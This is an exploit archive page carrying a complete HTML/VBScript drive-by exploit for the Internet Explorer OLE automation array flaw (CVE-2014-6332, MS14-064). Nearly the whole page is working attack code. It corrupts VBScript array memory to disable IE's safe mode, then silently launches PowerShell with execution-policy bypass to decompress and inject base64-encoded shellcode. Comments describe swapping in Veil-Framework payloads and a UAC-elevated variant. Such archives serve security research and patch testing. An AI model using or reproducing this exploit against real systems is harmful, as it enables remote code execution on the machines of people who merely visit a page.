exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Internet Explorer OLE Pre-IE11 Code Execution

Microsoft Internet Explorer OLE Pre-IE11 Code Execution
Posted Nov 21, 2014
Authored by b33f, GradiusX

Microsoft Internet Explorer OLE Pre-IE11 automation array remote code execution / powershell VirtualAlloc MS14-064 exploit.

tags | exploit, remote, code execution
advisories | CVE-2014-6332
SHA-256 | d3053b664458c408fee9df099a23f568d9bd4a2935dc2bc5f92cc1ab8dda07aa

Microsoft Internet Explorer OLE Pre-IE11 Code Execution

Change Mirror Download
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>

<pre>
|--------------------------------------------------------------------------|
| Title: OLE Automation Array Remote Code Execution => Pre IE11 |
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) |
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |
| Usage: http://www.fuzzysecurity.com/exploits/21.html |
|--------------------------------------------------------------------------|
Very nice black-magic yuange, don't think it went unnoticed that you
have been popping shells since 2009 :D 人无千日好,花无百日红
|--------------------------------------------------------------------------|
</pre>

<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")

'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'
payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="

command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

params="-NoP -NonI -Exec Bypass -Command " & command

'Original POC yuange
'set shell=createobject("Shell.Application")
'shell.ShellExecute "notepad.exe"

'With UAC
'shell.ShellExecute "powershell", params, "", "runas", 0

'Without UAC
shell.ShellExecute "powershell", params, "", "", 0

end function
</script>

<SCRIPT LANGUAGE="VBScript">

dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
On Error Resume Next
info=Navigator.UserAgent

if(instr(info,"Win64")>0) then
exit function
end if

if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function

end if

win9x=0

BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function

function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function

function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)

ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314

aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function


function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)

j=0
j=readmemo(i+&h120+k)

Exit for
end if

next
ab(2)=1.69759663316747E-313
runmumaa()
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim Preserve aa(a0)
redim ab(a0)

redim Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function

end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if


If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

redim Preserve aa(a0)

end function

function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

ab(0)=0

redim Preserve aa(a0)
end function

</script>

</body>
</html>

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close